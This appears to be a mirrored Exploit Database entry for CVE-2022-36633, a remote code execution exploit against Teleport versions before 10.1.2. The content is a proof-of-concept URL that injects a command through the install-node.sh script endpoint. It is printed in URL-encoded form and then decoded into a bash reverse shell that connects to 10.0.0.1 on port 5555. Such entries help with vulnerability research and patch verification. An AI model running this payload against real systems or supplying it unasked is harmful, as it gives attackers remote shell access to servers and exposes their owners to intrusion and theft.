Teleport v10.1.1 – Remote Code Execution (RCE)

• Exploit Database
• 40 阅读

• 作者： Brandon Roach
  日期： 2022-09-23
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51019/

• # Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
  # Date: 08/01/2022
  # Exploit Author: Brandon Roach & Brian Landrum
  # Vendor Homepage: https://goteleport.com
  # Software Link: https://github.com/gravitational/teleport
  # Version: < 10.1.2
  # Tested on: Linux
  # CVE: CVE-2022-36633
  
  Proof of Concept (payload):
  https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=
  f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=
  0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=
  method=3Diam
  
  
  Decoded payload:
  "
  /bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #